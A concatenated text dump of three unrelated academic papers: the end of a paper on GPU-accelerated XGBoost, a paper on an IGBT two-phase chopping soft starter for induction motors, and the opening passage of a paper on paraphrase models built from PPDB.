ROC curve) evaluation metric is appropriate. For the YLTR dataset we use the rank:ndcg objective and ndcg@10 evaluation metric to be consistent with the evaluation from Chen & Guestrin (2016). All other XGBoost parameters are left as the default values. Accuracy In Table 22, we show the accuracy of the GPU algorithm compared to the CPU version. We test on configuration #1 so use a subset of the training set to fit the data within device memory but use the full test set for accuracy evaluation. There is only minor variation in accuracy between the two algorithms. Both algorithms are equivalent for the Higgs dataset, the CPU algorithm is marginally more accurate for the YLTR dataset and the GPU algorithm is marginally more accurate on the Bosch dataset. In Table 23, we also show the accuracy without using the interleaved version of the GPU algorithm. Variations in accuracy are attributable to the interleaved version of the algorithm not choosing splits at the halfway point between two training examples, instead choosing the split value as the right most training example minus some constant. Differences also occur due to floating point precision as discussed in ‘Floating point precision.’ Speed Tables 24 and 25 show the relative speedup of the GPU algorithm compared to the CPU algorithm over 500 boosting iterations. For configuration #1 with lower end desktop hardware, speed ups of between 4.09� and 6.62� are achieved. On configuration #2 with higher end desktop hardware but the same number of cores, speed ups of between 3.16� and 5.57� are achieved. The GTX 970 used in configuration #1 must sample the datasets as they do not fit entirely in device memory. The Titan X used in configuration #2 is able to fit all three datasets entirely into memory. Figure 9 shows the performance of the GPU algorithm across varying problem sizes using configuration #1. The experiment is performed on subsets of the Bosch dataset using 20 boosting iterations. The GPU algorithm’s time increases linearly with respect to the number of input rows. It is approximately equal to the CPU algorithm at 10,000 Table 22 Accuracy benchmarks. Dataset Subset Metric CPU accuracy GPU accuracy YLTR 0.75 ndcg@10 0.7784 0.7768 Higgs 0.25 auc 0.8426 0.8426 Bosch 0.35 auc 0.6833 0.6905 Table 23 Accuracy benchmarks—sorting version only. Dataset Subset Metric GPU accuracy (sorting version only) YLTR 0.75 ndcg@10 0.7776 Higgs 0.25 auc 0.8428 Bosch 0.35 auc 0.6849 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 32/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ rows and always faster thereafter for this dataset. This gives an idea of the minimum batch size at which the GPU algorithm begins to be effective. In Fig. 10, we show the performance of the Titan X from configuration #2 against configuration #3 (a high-end 24 core server) on the Yahoo dataset with 500 boosting iterations and varying numbers of threads. Each data point shows the average time of eight runs. Error bars are too small to be visible at this scale. The Titan X outperforms the 24 core machine by approximately 1.2�, even if the number of threads for the 24 core machine is chosen optimally. Interleaved algorithm performance In Table 26 and Fig. 11, we show the effect of changing the threshold at which the algorithm switches between the interleaved version of the algorithm and the sorting version of the algorithm. Timings are from 100 boosting iterations on a 35% subset of the Bosch dataset using configuration #1. Using the interleaved version of the algorithm shows benefits all the way up to the fifth level with a 1.14� speed increase as compared to just using the sorting algorithm. After this depth temporary storage is insufficient to keep Table 24 Configuration #1 speed benchmarks. Dataset Subset CPU time (s) GPU time (s) Speedup YLTR 0.75 1,577 376 4.19 Higgs 0.25 7,961 1,201 6.62 Bosch 0.35 1,019 249 4.09 Table 25 Configuration #2 speed benchmarks. Dataset Subset CPU time (s) GPU time (s) Speedup YLTR 1.0 877 277 3.16 Higgs 1.0 14,504 3,052 4.75 Bosch 1.0 3,294 591 5.57 Figure 9 Bosch: time vs problem size. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 33/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ using the interleaved approach. Note that for the first level the interleaved algorithm and the sorting algorithm are equivalent as there is only one node bucket. Surprisingly the interleaved algorithm is still faster than the sorting algorithm at level 5 despite the fact that the multiscan and multireduce operations must sequentially iterate over 2 5 = 32 nodes at each step. This shows that executing instructions on elements Figure 10 Yahoo LTR: n-threads vs time. Table 26 Bosch dataset: interleaved levels. Levels GPU time (s) Accuracy Speedup 0 85.96 0.7045 1.0 1 85.59 0.7102 1.0 2 82.32 0.7047 1.04 3 79.97 0.7066 1.07 4 76.38 0.7094 1.13 5 75.21 0.7046 1.14 Figure 11 Bosch: interleaved algorithm threshold. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 34/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ held in registers or shared memory carries a very low cost relative to uncoalesced re-ordering of elements in device memory, as is performed when radix sorting. Memory consumption We show the device memory consumption in Table 27 for all three benchmark datasets. Each dataset can be fit entirely within the 12 GB device memory of a Titan X card. In Table 28, we show the memory consumption of the original CPU algorithm for comparison. Host memory consumption was evaluated using the valgrind massif (http://valgrind.org/docs/manual/msmanual.html) heap profiler tool. Device memory usage was recorded programmatically using custom memory allocators. The device memory requirements are approximately twice that of the original CPU algorithm. This is because the CPU algorithm is able to process data in place, whereas the GPU algorithm requires sorting functions that are not in place and must maintain separate buffers for input and output. CONCLUSION A highly practical GPU-accelerated tree construction algorithm is devised and evaluated within the XGBoost library. The algorithm is built on top of efficient parallel primitives and switches between two modes of operation depending on tree depth. The ‘interleaved’ mode of operation shows that multiscan and multireduce operations with a limited number of buckets can be used to avoid expensive sorting operations at tree depths below six, resulting in speed increases of 1.14� for the GPU implementation. The GPU algorithm provides speedups of between 3� and 6� over multicore CPUs on desktop machines and a speed up of 1.2� over 2� Xeon CPUs with 24 cores. We see significant speedups for all parameters and datasets above a certain size, while providing an algorithm that is feature complete and able to handle sparse data. Potential drawbacks of the algorithm are that the entire input matrix must fit in device memory and device memory consumption is approximately twice that of the host memory used by the CPU algorithm. Despite this, we show that the algorithm is memory efficient enough to process the entire Higgs dataset containing 10 million instances and 28 features on a single 12 GB card. Table 27 Memory: GPU algorithm. Dataset Device memory (GB) YLTR 4.03 Higgs 11.32 Bosch 8.28 Table 28 Memory: CPU algorithm. Dataset Host memory (GB) YLTR 1.80 Higgs 6.55 Bosch 3.28 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 35/37 http://valgrind.org/docs/manual/msmanual.html http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Our algorithm provides a practical means for XGBoost users processing large data sets to significantly reduce processing times, showing that gradient boosting tasks are a good candidate for GPU-acceleration and are therefore no longer solely the domain of multicore CPUs. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by a Marsden Grant from the Royal Society of New Zealand (UOW1502). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Marsden Grant from the Royal Society of New Zealand: UOW1502. Competing Interests Eibe Frank is an Academic Editor for PeerJ. Author Contributions � Rory Mitchell conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � Eibe Frank conceived and designed the experiments, wrote the paper and reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu REFERENCES Baxter S. 2013. Modern GPU—performance. Available at https://moderngpu.github.io/ performance.html (accessed 14 June 2016). Blelloch GE. 1990. Prefix sums and their applications. Technical report CMU-CS-90-190, School of Computer Science, Carnegie Mellon University. Chen T, Guestrin C. 2016. Xgboost: a scalable tree boosting system. In: Proceedings of the 22Nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 785–794. Chiu C-C, Luo G-H, Yuan S-M. 2011. A decision tree using CUDA GPUs. In: Proceedings of the 13th International Conference on Information Integration and Web-based Applications and Services. New York: ACM, 399–402. Coates A, Huval B, Wang T, Wu D, Catanzaro B, Andrew N. 2013. Deep learning with COTS HPC systems. In: Proceedings of The 30th International Conference on Machine Learning, jmlr.org, 1337–1345. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 36/37 https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu https://moderngpu.github.io/performance.html https://moderngpu.github.io/performance.html http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Eilers M. 2014. Multireduce and multiscan on modern GPUs. Master’s thesis, Department of Computer Science, University of Copenhagen. Friedman J, Hastie T, Tibshirani R. 2001. The elements of statistical learning. In: Springer Series in Statistics. Vol. 1. Berlin: Springer, 337–387. Grahn H, Lavesson N, Lapajne MH, Slat D. 2011. CudaRF: a CUDA-based implementation of random forests. In: Proceedings of the 9th IEEE/ACS International Conference on Computer Systems and Applications, IEEE Computer Society, 95–101. Hall M, Frank E, Holmes G, Pfahringer B, Reutemann P, Witten IH. 2009. The WEKA data mining software: an update. ACM SIGKDD Explorations Newsletter 11(1):10–18 DOI 10.1145/1656274.1656278. Harris M. 2007. Optimizing parallel reduction in CUDA. Available at http://developer.download. nvidia.com/assets/cuda/files/reduction.pdf (accessed 31 March 2017). Harris M. 2013. How to access global memory efficiently in CUDA C/C++ kernels. Available at http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ (accessed 24 November 2016). Harris M, Sengupta S, Owens JD. 2007. Parallel prefix sum (scan) with CUDA. GPU Gems 3(39):851–876. Higham NJ. 1993. The accuracy of floating point summation. SIAM Journal on Scientific Computing 14(4):783–799 DOI 10.1137/0914050. Hillis WD, Steele GL Jr. 1986. Data parallel algorithms. Communications of the ACM 29(12):1170–1183 DOI 10.1007/978-1-4612-1220-1_11. Hoberock J, Bell N. 2017. Thrust: a parallel template library. Available at https://thrust.github.io/. Lo W-T, Chang Y-S, Sheu R-K, Chiu C-C, Yuan S-M. 2014. CUDT: a CUDA based decision tree algorithm. Scientific World Journal 2014:1–12 DOI 10.1155/2014/745640. Matloff N. 2011. Programming on parallel machines. Available at http://heather.cs.ucdavis.edu/ ~matloff/158/PLN/ParProcBook.pdf. Merrill D, Grimshaw A. 2011. High performance and scalable radix sorting: a case study of implementing dynamic parallelism for GPU computing. Parallel Processing Letters 21(2):245–272 DOI 10.1142/s0129626411000187. Merrill D, NVIDIA-Labs. 2016. CUDA UnBound (CUB) library. Available at http://nvlabs.github. io/cub/. Nasridinov A, Lee Y, Park Y-H. 2014. Decision tree construction on GPU: ubiquitous parallel computing approach. Computing 96(5):403–413 DOI 10.1007/s00607-013-0343-z. Nvidia. 2016. Block scan algorithms. Available at http://nvlabs.github.io/cub/namespacecub. html#abec44bba36037c547e7e84906d0d23ab (accessed 30 December 2016). Nvidia. 2017. CUDA C programming guide. Available at http://docs.nvidia.com/cuda/index.html. Quinlan JR. 2014. C4.5: Programs for Machine Learning. San Francisco: Elsevier. Sharp T. 2008. Implementing decision trees and forests on a GPU. In: Proceedings of the 10th European Conference on Computer Vision. Berlin: Springer, 595–608. Strnad D, Nerat A. 2016. Parallel construction of classification trees on a GPU. Concurrency and Computation: Practice and Experience 28(5):1417–1436 DOI 10.1002/cpe.3660. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 37/37 http://dx.doi.org/10.1145/1656274.1656278 http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ http://dx.doi.org/10.1137/0914050 http://dx.doi.org/10.1007/978-1-4612-1220-1_11 https://thrust.github.io/ http://dx.doi.org/10.1155/2014/745640 http://heather.cs.ucdavis.edu/~matloff/158/PLN/ParProcBook.pdf http://heather.cs.ucdavis.edu/~matloff/158/PLN/ParProcBook.pdf http://dx.doi.org/10.1142/s0129626411000187 http://nvlabs.github.io/cub/ http://nvlabs.github.io/cub/ http://dx.doi.org/10.1007/s00607-013-0343-z http://nvlabs.github.io/cub/namespacecub.html#abec44bba36037c547e7e84906d0d23ab http://nvlabs.github.io/cub/namespacecub.html#abec44bba36037c547e7e84906d0d23ab http://docs.nvidia.com/cuda/index.html http://dx.doi.org/10.1002/cpe.3660 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Accelerating the XGBoost algorithm using GPU computing Introduction Background and Related Work Parallel Tree Construction Evaluation Conclusion References work_lhrdzyewqzbkrgorihi373miku ---- 90 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 The Design of Two Phase Chopping Regulation Voltage Soft Starter Jingwen Chen*, Hongshe Dang School of Electrical and Information Engineering, Shaanxi University of Science & Technology, Xi’an, 710021, China *Address correspondence to this author at xuefu Road, Xi’an, China. postcode:710021 E-mail:15991663575@163.com Abstract. As for the complexity of the trigger pulse control method for the generally-used thyristor soft starter, The poverty of the continuity of the stator current, the shortage of the waveform distortion and the higher harmonic content. A type with IGBT to realize AC chopping regulation voltage soft starter has been designed，using the two-phase AC power control to achieve the aim of three-phase AC power control，ensuring the effect and saving the costs. The paper makes use of the MATLAB to analyze of the two phase chopping regulating all control type soft starter start performance with simulation, and designs the soft starter of the hardware circuit and the software programs. Keywords: IGBT, Two phase chopping, Asynchronous motor, Soft starter 1. Introductiong In the application of the motor, the starting of the motor problem is particularly important. When the asynchronous motor starts, transient current shock is large, generally up to 4~8 times than the motor rated current, and even larger. Too large starting impact current will cause adverse effect on the motor itself, the normal operation of the other electrical equipment and power grid. Because of the half control of thyristor, the discontinuous current, currently used thyristor voltage regulation of the soft starter will produce a lot of low harmonic, causing harmonic pollution, making the output voltage waveform distort serious and influencing the dynamic characteristics of the motor[1-3]. Because of using all control devices, the two phase chopping regulating all control type soft starter can be shut off by self and can achieve the stator voltage stepless regulation by changing duty ratios of the trigger pulse. Its advantage is that IGBT trigger pulse does not need to link the phase of the three-phase BUS voltage, and has no need to test the zero crossing point. It regulates voltage by adjusting the duty ratios of trigger pulse without calculating the firing angle; the control algorithm and the implementation method are relatively simple. In the use of the freewheeling circuit, The motor current and voltage waveform become much closer to the sine wave, and the waveform distortion rate becomes low [4-5]. 2. The main circuit of two phase chopping regulating soft starter The two phase chopping regulating all control type soft starter is by controlling the duty ratio of all control devices IGBT trigger pulse to adjust the input voltage of stator from power grid, so as to adjust the size of the starting electromagnetic torque. Specifically it’s adjusting the three-phase output voltage size by controlling the output voltage of the two phase. The main circuit topology structure is shown in The Design of Two Phase Chopping Regulation Voltage Soft Starter 91 Fig.1 The specific voltage regulation methods are as follows: The main circuit structure adopts four power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form two groups of basic single-phase ac voltage regulation circuit (1), (2), respectively concatenated in the power supply phase A and phase B of the three-phase ac asynchronous motor. In addition, it adopts six power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form a three-phase freewheel bridge (3). The three-phase freewheel bridge connects ac voltage regulation circuit to three-phase ac asynchronous motor stator winding. In order to detect and control the starting current, set up current transformer (12), (13), (14) to A, B, C phase power line of the three-phase ac asynchronous motor respectively. Then the current signal tested by the current transformer will be send to the microprocessor control system (5). On the main circuit control, the control pulse generated by the microprocessor control system has two ways, one triggers the insulated gate bipolar transistor (8), (7) of two sets of ac voltage regulation (1), (2) shown in diagram, the other triggers the insulated gate bipolar transistor (6) of the three-phase freewheel bridge dc side. The positive and negative of these two pulses are exactly opposite, and they are complementary pulse. Therefore, when (8), (7) trigger on, (6) shuts off , then three-phase ac power supplies to three-phase ac asynchronous motor; when the (8), (7) shut off, (6) triggers on, then three- phase ac asynchronous motor stator current follow current by three-phase freewheel bridge. Figure.1 The main circuit structure of two phase chopping regulating soft starter 3. Start modes The soft starter has a variety of start modes: voltage ramp start, voltage ramp start with pulse kick, current-limiting start, dual ramp start, etc. The maximum allowable time during start process can be set as starting time parameter, and starting time limit range is: 10-120 s, the default value is 60s. The start-up way is as follows: For voltage ramp start, the user can set up an initial starting torque, and this initial starting torque corresponds to an initial starting voltage. The voltage of the motor increases at a fixed growth rate from the initial starting voltage by a constant speed, until up to the rated voltage. And the growth rate of voltage can be adjusted to adapt to different starting times. A B C M A B C (1) MCU (2) (5) (4) (3) (6) (8) (12) (13) (15) (9) D1 D2 D5D3 D6D4 D7 D8 D9 D10 D11 D12 D13 D14 (10) (11) (7) (14) 92 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Voltage ramp start with pulse kick is the mode that gives the motor with a higher starting voltage for a short period of time in the motor starting moment, making the motor produce a large instantaneous torque to overcome the static friction torque under the static state, and making the motor turn up. Its main application is on overloading starting motor. Current-limiting start provides the motor decompression start with a fixed current, used to limit the maximum starting current, which is mainly used in the occasion of the need to limit the impact current when starting[6-8]. Current-limiting start needs to cooperate with the effective value of current detection circuit. The program contains the PID current limit control algorithm, fuzzy control algorithm or combining fuzzy and PID control algorithm, etc. [4], which makes the motor current won’t exceed the maximum value during the process of start, as the voltage ramp starts without a maximum value range, providing a kick torque start. The current-limiting start current limit value can be set in 2 ~ 4 times of the rated current. Dual ramp start, similar to voltage ramp start, corresponds to two different rates of voltage rise. These two start solutions are set in advance. According to their practical application , users could store two commonest start modes in the soft starter, in order to set the starting parameters quickly to start motor. Slope 1 starts from 50% of the full voltage, lasts 100s, and linear increases to full voltage. Slope 2 starts from 70% of the full voltage, lasts 120s, and linear increases to full voltage. The motor can also firstly start by the slope 2. The initial torque is higher, but the voltage rise slowly, which makes the current of the motor change not severe. When the motor speeds up, the current will be reduced, making the motor rise to full voltage rapidly, and completing the start. 4. The Simulation Analysis of Two Phase Chopping Regulating All Control Type Soft Start Based on the main circuit of two phase chopping regulating all control type soft starter shown in the figure.1, the simulation model shown in Fig.2 is built. Simulation parameter settings are as follows: IGBT switching frequency is 1KHz, trigger pulse duty ratio 0.5, three-phase ac power source 380V, 50 Hz, asynchronous motor rated power 15kw , rated voltage 400V, rated frequency 50Hz,and the load torque 85N•m. Figure.2 The main circuit model of two phase chopping regulating soft starter The Design of Two Phase Chopping Regulation Voltage Soft Starter 93 The stator current simulation result of two phase chopping regulating all control type soft starter is shown in Fig.3, it can be shown from the diagram that the stator current fluctuation is significantly decreased than that of thyristor regulating soft start, and the biggest stator current is about 2 times than that of stable operation when starts [9-10] . Figure.3 The stator current simulation result of two phase chopping regulating soft starter Fig.4 is the speed and torque simulation results of two phase chopping regulating all control type soft starter. It can be reflected: the revolving speed of two phase chopping regulating all control type soft starter rises faster, and the rising process is smoother. The time to stabilization is also ahead of thyristor regulating soft starter. The starting torque of two phase chopping regulating all control type soft starter is smoother, there’s no peak impact torque. Fig.5 is the stator current local amplification figure of two phase chopping regulating all control type soft starter. It can indicated from the picture that as IGBT works under the high switch frequency, the stator current waveform is very close to the sine wave, and the stator current is continuous. Discontinuous phenomenon hardly appears for a while near zero. Figure.4 The speed and torque simulation results of two phase chopping regulating soft starter Figure.5 The stator current local amplification figure of two phase chopping regulating soft starter 94 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Fig.6 is the FFT analysis of two phase chopping regulating soft starter A phase stator current simulation results. It can be presented that the main harmonic frequency is 19, 21, 59, 61, and the total harmonic factor is only 6.15%, compared with thyristor regulating soft start. The total harmonic factor has fallen by half. The harmonic content of 19 and 21 is higher, and they belong to higher harmonic, easy to be filtered through the filter circuit. Figure.6 the FFT analysis of two phase chopping regulating soft starter A phase stator current Through the analysis of simulation results, it confirms that the two phase chopping regulating all control type soft starter has the advantages: small starting current, smooth starting torque, low total harmonic content, and low harmonic content, compared with thyristor regulating soft starter. 5. The Hardware Circuit Design of Two Phase Chopping Regulating All Control Type Soft Starter The hardware schematic diagram of two phase chopping regulating soft starter is shown in Fig.7. It mainly includes several main parts: the main control chip STM32[5], communication circuit, current detection circuit, USB to serial communication circuit, the CPLD circuit, voltage detection circuit, drive circuit, power circuit. Every subcircuit needs to be connected with the corresponding power supply circuit, without showing the specific connection in the picture. Figure.7 The schematic diagram of two phase chopping regulating soft starter drive circuit 485 communication circuit USB to serial communication circuit current detection circuit the main control chip STM32 voltage detection circuit CPLD circuit The Design of Two Phase Chopping Regulation Voltage Soft Starter 95 6. The Software Design of Two Phase Chopping Regulating All Control Type Soft Start System 6.1 The design of main program As the central control system, two phase chopping regulating soft start main program, has command and deployment effects to the behavior of each program of the control system .The main program flow chart of control system is shown in Fig.8. Simple its structure is, it is the soul of the whole control system, and has irreplaceable importance. The detailed working process is displayed below. Figure.8 The main program flow chart of control system First of all, the control system must initialize the main control chip internal various registers and each external pin operation after power-on. Then run a series of system detection subroutines by reading the corresponding parameters of pin, to judge whether the current environment of the motor could start. The operation of the main subroutines on the stage includes phase sequence detection, lack of phase detection, temperature detection. If the detect results conform to the motor starting, it will enter to scan key link. This link uses to monitor whether the control signals are input by the human through the keyboard. If so, the process enters the key processing steps, then the relevant subroutines process the control of the input signal, and wait for starting. If the output of detection subroutines does not conform to the motor starting, the system will enter the fault process which will be displayed. After the fault processed, test whether it conforms to the motor starting conditions. 6.2 The design of main program Current-limiting starting mode is a more detailed starting mode, which highlights the current size Start Initializati on Fault？ Fault process and display Key Scan System Check Key process Yes No Yes No 96 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 control in the process of motor starting. It needs to feedback the real-time current to the main control system in the process of motor starting , then by the comparing the value of the real-time current with the set current, the main control system generates control signal, adjusts the IGBT trigger pulse duty ratio, and then makes the motor starting current near the set value within a range. This way of starting is relatively complex. Figure.9 Flow chart of current limiting soft start The biggest starting current of the current-limiting starting is generally no more than four times of the electric motor rated current. Usually the current limit control algorithm has PID method, fuzzy control method, the combination of PID and fuzzy control method, and so on. This article uses the fuzzy control method. Flow chart of current limiting soft start is shown in Fig.9. 7. Conclusion This paper proposes the two phase chopping regulating all control type soft starter. Its starting current, starting torque, total harmonic content and the stator current waveform, are all superior to the thyristor voltage regulating soft starter. The paper proposed the hardware circuit and the software program of the two phase chopping regulating all control type soft starter. The harmonic content of the two phase chopping regulating all control type soft starter is lower. Compared with thyristor regulating soft starter, the starting current is closer to the sine wave, and with good continuity, Control algorithm is simple, the protection circuit is complete, the system has high stability and easy maintenance, and Large starting < Initialization Read the set value Compared with the set value Reduce the duty ratio > Start End the start Over Yes No Keep Whether reach 150ms No Increase the duty ratio Delay Read the Current value Delay Read the Current value Compared with the set value Keep = < Stop and report the fault = > Yes Set the duty ratio size The Design of Two Phase Chopping Regulation Voltage Soft Starter 97 torque is continuous adjustable. With use less of power electronic devices, the equipment controls the two phase to achieve the purpose of control three phase, saving costs. It’s a method of ac asynchronous motor soft start worth promoting. Acknowledgment The authors wish to thank Shaanxi provincial government. This work was supported in part by Industrial research project of Science and Technology Department of Shaanxi Province. Fund number:2015GY074. Reference [1] Hu Hongming, “The study of asynchronous motor soft start”, master thesis, Huazhong university of science and technology, wuhan, china. June 1, 2010. [2] Sun Jinji, Fang Jiancheng, Wang Jianmin, “The shock in the process of asynchronous motor soft start”, Transactions of China Electrotechnical Society，vol. 22, pp. 15-21, February 2007. [3] Fan Liping, Zhang Liang, “Fuzzy simulation of asynchronous motor soft start”, Transactions of Power System and Automation, vol. 23, pp. 123-126, March 2011. [4] Fan Liping, Hu Wenhao, “The study of combination of filtering function asynchronous motor soft start”, Electric Drive, vol. 41, pp. 61-64, September 2011. [5] Meng Yanjing, Gong Wenzhan, “The hardware design of the intelligent soft starter control system”, Small & Special Electrical Machines, vol. 40, pp. 64-72, January 2012. [6] Shicheng Zheng, Hong Zhu, Xiaohu Cao, Weihua Wu, Qianzhi Zhou, “Research And Implementation Of A Novel Single Phase Ac/Ac Variable Frequency Technology”, High Voltage Engineering, vol. 10, pp. 139-143, March 2009. [7] G.Zenginobuz, I.Cadirci, M.Ermis, C.Barlak, “Soft Starting Of Large Induction Motors At Constant Current With Minimized Starting Torque Pulsations”, IEEE Industry Applications Conference, vol.3, pp.1593-1604, March 2000. [8] Xiuhua Zhang, Lin He, Guangxi Li, Zhou Zhou, “The analysis of structure strength and calculation of critical speed of a new type of high-speed permanent magnet motor”, Energy Education Science and Technology Part A, vol. 32, pp. 143-148, January 2014. [9] Yunrui Wang, “Study on electric furnace power quality integrated control system”, Energy Education Science and Technology Part A, vol. 32, pp. 895-904, February 2014. [10] Zhongxian Wang, Yonggeng Wei, Chunyan Li, “Study on APFC circuit in the single-phase variable frequency power supply”, Energy Education Science and Technology Part A, vol. 32, pp.355-356, January 2014. work_liz65ql5sngstk6qo3rdxliyw4 ---- From Paraphrase Database to Compositional Paraphrase Model and Back John Wieting∗ Mohit Bansal† Kevin Gimpel† Karen Livescu† ∗University of Illinois at Urbana-Champaign, Urbana, IL, 61801, USA wieting2@illinois.edu †Toyota Technological Institute at Chicago, Chicago, IL, 60637, USA {mbansal,kgimpel,klivescu}@ttic.edu Abstract The Paraphrase Database (PPDB; Ganitke- vitch et al., 2013) is an extensive semantic re- source, consisting of a list of phrase pairs with (heuristic) confidence estimates. However, it is still unclear how it can best be used, due to the heuristic nature of the confidences and its necessarily incomplete coverage. We propose models to leverage the phrase pairs from the PPDB to build parametric paraphrase models that score paraphrase pairs more accurately than the PPDB’s internal scores while simul- taneously improving its coverage. They allow for learning phrase embeddings as well as im- proved word embeddings. Moreover, we in- troduce two new, manually annotated datasets to evaluate short-phrase paraphrasing mod- els. Using our paraphrase model trained using PPDB, we achieve state-of-the-art results on standard word and bigram similarity tasks and beat strong baselines on our new short phrase paraphrase tasks.1 1 Introduction Paraphrase detection2 is the task of analyzing two segments of text and determining if they have the same meaning despite differences in structure and wording. It is useful for a variety of NLP tasks like question answering (Rinaldi et al., 2003; Fader et al., 2013), semantic parsing (Berant and Liang, 2014), textual entailment (Bosma and Callison- Burch, 2007), and machine translation (Marton et al., 2009). 1We release our datasets, code, and trained models at http://web.engr.illinois.edu/˜wieting2/. 2See Androutsopoulos and Malakasiotis (2010) for a survey on approaches for detecting paraphrases. One component of many such systems is a para- phrase table containing pairs of text snippets, usu- ally automatically generated, that have the same meaning. The most recent work in this area is the Paraphrase Database (PPDB; Ganitkevitch et al., 2013), a collection of confidence-rated paraphrases created using the pivoting technique of Bannard and Callison-Burch (2005) over large parallel corpora. The PPDB is a massive resource, containing 220 million paraphrase pairs. It captures many short paraphrases that would be difficult to obtain us- ing any other resource. For example, the pair {we must do our utmost, we must make every effort} has little lexical overlap but is present in PPDB. The PPDB has recently been used for monolingual align- ment (Yao et al., 2013), for predicting sentence sim- ilarity (Bjerva et al., 2014), and to improve the cov- erage of FrameNet (Rastogi and Van Durme, 2014). Though already effective for multiple NLP tasks, we note some drawbacks of PPDB. The first is lack of coverage: to use the PPDB to compare two phrases, both must be in the database. The second is that PPDB is a nonparametric paraphrase model; the number of parameters (phrase pairs) grows with the size of the dataset used to build it. In practice, it can become unwieldy to work with as the size of the database increases. A third concern is that the confidence estimates in PPDB are a heuristic com- bination of features, and their quality is unclear. We address these issues in this work by introduc- ing ways to use PPDB to construct parametric para- phrase models. First we show that initial skip-gram word vectors (Mikolov et al., 2013a) can be fine- tuned for the paraphrase task by training on word pairs from PPDB. We call them PARAGRAM word vectors. We find additive composition of PARA- GRAM vectors to be a simple but effective way to 345 Transactions of the Association for Computational Linguistics, vol. 3, pp. 345–358, 2015. Action Editor: Hal Daumeé III. Submission batch: 1/2015; Revision batch 4/2015; Published 6/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. http://web.engr.illinois.edu/~wieting2/ embed phrases for short-phrase paraphrase tasks. We find improved performance by training a recur- sive neural network (RNN; Socher et al., 2010) di- rectly on phrase pairs from PPDB. We show that our resulting word and phrase rep- resentations are effective on a wide variety of tasks, including two new datasets that we introduce. The first, Annotated-PPDB, contains pairs from PPDB that were scored by human annotators. It can be used to evaluate paraphrase models for short phrases. We use it to show that the phrase embeddings produced by our methods are significantly more indicative of paraphrasability than the original heuristic scoring used by Ganitkevitch et al. (2013). Thus we use the power of PPDB to improve its contents. Our second dataset, ML-Paraphrase, is a re- annotation of the bigram similarity corpus from Mitchell and Lapata (2010). The task was origi- nally developed to measure semantic similarity of bigrams, but some annotations are not congruent with the functional similarity central to paraphrase relationships. Our re-annotation can be used to assess paraphrasing capability of bigram composi- tional models. In summary, we make the following contributions: Provide new PARAGRAM word vectors, learned using PPDB, that achieve state-of-the-art per- formance on the SimLex-999 lexical similarity task (Hill et al., 2014b) and lead to improved per- formance in sentiment analysis. Provide ways to use PPDB to embed phrases. We compare additive and RNN composition of PARA- GRAM vectors. Both can improve PPDB by re- ranking the paraphrases in PPDB to improve corre- lations with human judgments. They can be used as concise parameterizations of PPDB, thereby vastly increasing its coverage. We also perform a qualita- tive analysis of the differences between additive and RNN composition. Introduce two new datasets. The first contains PPDB phrase pairs and evaluates how well models can measure the quality of short paraphrases. The second is a new annotation of the bigram similar- ity task in Mitchell and Lapata (2010) that makes it suitable for evaluating bigram paraphrases. We release the new datasets, complete with anno- tation instructions and raw annotations, as well as our code and the trained models.3 2 Related Work There is a vast literature on representing words as vectors. The intuition of most methods to create these vectors (or embeddings) is that similar words have similar contexts (Firth, 1957). Earlier models made use of latent semantic analysis (LSA) (Deer- wester et al., 1990). Recently, more sophisticated neural models, work originating with (Bengio et al., 2003), have been gaining popularity (Mikolov et al., 2013a; Pennington et al., 2014). These embeddings are now being used in new ways as they are being tailored to specific downstream tasks (Bansal et al., 2014). Phrase representations can be created from word vectors using compositional models. Simple but effective compositional models were studied by Mitchell and Lapata (2008; 2010) and Blacoe and Lapata (2012). They compared a variety of bi- nary operations on word vectors and found that simple point-wise multiplication of explicit vector representations performed very well. Other works like Zanzotto et al. (2010) and Baroni and Zampar- elli (2010) also explored composition using models based on operations of vectors and matrices. More recent work has shown that the extremely efficient neural embeddings of Mikolov et al. (2013a) also do well on compositional tasks simply by adding the word vectors (Mikolov et al., 2013b). Hashimoto et al. (2014) introduced an alternative word embedding and compositional model based on predicate-argument structures that does well on two simple composition tasks, including the one intro- duced by Mitchell and Lapata (2010). An alternative approach to composition, used by Socher et al. (2011), is to train a recursive neural network (RNN) whose structure is defined by a bi- narized parse tree. In particular, they trained their RNN as an unsupervised autoencoder. The RNN captures the latent structure of composition. Recent work has shown that this model struggles in tasks in- volving compositionality (Blacoe and Lapata, 2012; Hashimoto et al., 2014).4 However, we found 